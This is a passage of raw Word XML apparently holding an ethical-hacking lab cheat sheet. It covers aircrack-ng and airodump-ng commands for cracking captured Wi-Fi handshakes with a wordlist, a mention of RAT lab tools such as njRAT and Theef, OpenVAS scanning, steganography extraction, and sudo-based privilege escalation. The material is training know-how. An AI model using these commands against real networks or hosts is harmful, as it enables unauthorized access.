      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the which has server.exe or client.exe along with the main executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="2D8613FC" w14:textId="0A3F29D0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">step 5: Strongly recommended that, please complete the LAB from module 7 lab 1: </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>njrat</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>prorate,Mosucker</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>theef</w:t>
      </w:r>
      <w:r w:rsidR="33E0DA64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CBD582F" w:rsidP="7D333612" w:rsidRDefault="2CBD582F" w14:paraId="50BF724C" w14:textId="0B40BDF3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Wifi</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="6F29EE93">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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Use air-crack for </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cracking.And</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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you will get the answer</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> /flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CBD582F" w:rsidP="7D333612" w:rsidRDefault="2CBD582F" w14:paraId="42EA163A" w14:textId="7F3202F5">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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: </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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-ng -w </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pathto</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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/password.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>path_to_pcap_file.cap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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 [this works]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CBD582F" w:rsidP="7D333612" w:rsidRDefault="2CBD582F" w14:paraId="18A0EFEF" w14:textId="7BF5EBD8">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Aircrack</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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-ng –j </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2AE4A2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7D333612" w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>test.cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CBD582F" w:rsidP="7D333612" w:rsidRDefault="2CBD582F" w14:paraId="5B6C6780" w14:textId="3D3D09FD">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3D2AE4A2">
        <w:drawing>
          <wp:inline wp14:editId="135017AE" wp14:anchorId="6377BB43">
            <wp:extent cx="4638676" cy="2172934"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5777819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b54e82f05d1468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8676" cy="2172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BD582F" w:rsidP="7D333612" w:rsidRDefault="2CBD582F" w14:paraId="2423A3E4" w14:textId="2C0E5024">
      <w:pPr/>
      <w:r w:rsidR="3D2AE4A2">
        <w:drawing>
          <wp:inline wp14:editId="3741B976" wp14:anchorId="0D74FC81">
            <wp:extent cx="4648202" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3632093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2f7a45ff02141c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2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2AE4A2" w:rsidP="7D333612" w:rsidRDefault="3D2AE4A2" w14:paraId="75926F3A" w14:textId="35861303">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-ng -a2 -b 02:1A:</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>11:FF</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:D9:BD -w /</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/share/wordlists/rockyou.txt </w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>wifi.hccapx</w:t>
      </w:r>
      <w:r w:rsidR="3D2AE4A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2nd method is faster)</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5878657B" w:rsidP="7D333612" w:rsidRDefault="5878657B" w14:paraId="3205761B" w14:textId="22D43C4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5878657B" w:rsidP="7D333612" w:rsidRDefault="5878657B" w14:paraId="5B08BE1D" w14:textId="5C6EDA1F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-ng Wificap.cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5878657B" w:rsidP="7D333612" w:rsidRDefault="5878657B" w14:paraId="695F2603" w14:textId="2163AE93">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>airodump</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>bssid</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> BSSID --channel </w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>CHANNEL</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w </w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>outputfile</w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Wificap.cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5878657B" w:rsidP="7D333612" w:rsidRDefault="5878657B" w14:paraId="4E2CF352" w14:textId="65CF0A0C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5878657B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; aircrack-ng -w /path/to/wordlist.txt outputfile-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="5F51887F" w14:textId="11DA2B66">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="04258818">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenVas </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="69E6A90A" w14:textId="4786E545">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Log in to OpenVAS. Create a New Target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="5CF07B89" w14:textId="4BE2511D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Configuration Targets New Target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="42245C65" w14:textId="4696572E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Set target ip .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="786C96AD" w14:textId="369EBBFB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Create a New Task:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="77D8DC2E" w14:textId="5F918A06">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Scans Tasks New Task. Select target 192.168.44.32 . Choose scan configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="53D39C56" w14:textId="1A0A1A9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Run the Task:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="42B29A8F" w14:textId="651AB7BF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Start the scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="1964F551" w14:textId="7BE9AD82">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>View the Report:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="478C21E0" w14:textId="2188C6A3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="04258818">
        <w:rPr/>
        <w:t>Scans Reports View the report. Sort vulnerabilities by severity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="291D034B" w14:textId="7D418DF0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2144AACF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>File Steganography:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="37514D79">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="6A44993E">
        <w:rPr/>
        <w:t>SNOW.EXE -C -p "pass" filename.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="00ABE204" w14:textId="29583201">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6A44993E">
        <w:rPr/>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="37514D79">
        <w:rPr/>
        <w:t>snow -C -p "&lt;password&gt;" &lt;filename&gt;.txt (then it will show the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F5D67A2" w:rsidP="0F5D67A2" w:rsidRDefault="0F5D67A2" w14:paraId="41304C88" w14:textId="63ADA1E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="37514D79">
        <w:rPr/>
        <w:t>content of file.txt content) (copy the file to the snow file location if necessary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B27C9D0" w:rsidP="5C5AA300" w:rsidRDefault="4B27C9D0" w14:paraId="72AF23FB" w14:textId="00D1D74C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4B27C9D0">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="4B27C9D0">
        <w:rPr/>
        <w:t>stegsnow</w:t>
      </w:r>
      <w:r w:rsidR="4B27C9D0">
        <w:rPr/>
        <w:t xml:space="preserve"> -p password -C restricted.txt output.txt (kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="644E0158" w:rsidP="5C5AA300" w:rsidRDefault="644E0158" w14:paraId="4D5174F2" w14:textId="18F2B062">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="644E0158">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Image Steganography:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="644E0158" w:rsidP="5C5AA300" w:rsidRDefault="644E0158" w14:paraId="28E4D436" w14:textId="5F978182">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="644E0158">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; decode using </w:t>
      </w:r>
      <w:r w:rsidR="644E0158">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>OpenStego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4246763E" w:rsidP="5C5AA300" w:rsidRDefault="4246763E" w14:paraId="3BDE5266" w14:textId="5804F5F0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="4246763E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="4246763E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55EAD69F" w:rsidP="5C5AA300" w:rsidRDefault="55EAD69F" w14:paraId="473000D5" w14:textId="6E1891C4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; scan the network for remote </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>login(</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ssh/telnet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55EAD69F" w:rsidP="5C5AA300" w:rsidRDefault="55EAD69F" w14:paraId="50348C92" w14:textId="1CA9EBD2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; ssh test@ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55EAD69F" w:rsidP="5C5AA300" w:rsidRDefault="55EAD69F" w14:paraId="75A89976" w14:textId="5DA08244">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;check </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>privileges :</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55EAD69F" w:rsidP="5C5AA300" w:rsidRDefault="55EAD69F" w14:paraId="7E0299CD" w14:textId="711CE672">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>swith</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to root if possible: </w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55EAD69F" w:rsidP="5C5AA300" w:rsidRDefault="55EAD69F" w14:paraId="7FCBC7E3" w14:textId="5EB9DA48">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55EAD69F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="29A51E83">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>cd/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F6E6140" w:rsidP="5C5AA300" w:rsidRDefault="4F6E6140" w14:paraId="4E55AFF6" w14:textId="0867BB31">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4F6E6140">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; ls</w:t>
      </w:r>
      <w:r w:rsidR="7B31DF37">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="4F6E6140">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>IR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B31DF37" w:rsidP="7D333612" w:rsidRDefault="7B31DF37" w14:paraId="0B6FFE57" w14:textId="78ED4493">
      <w:pPr>
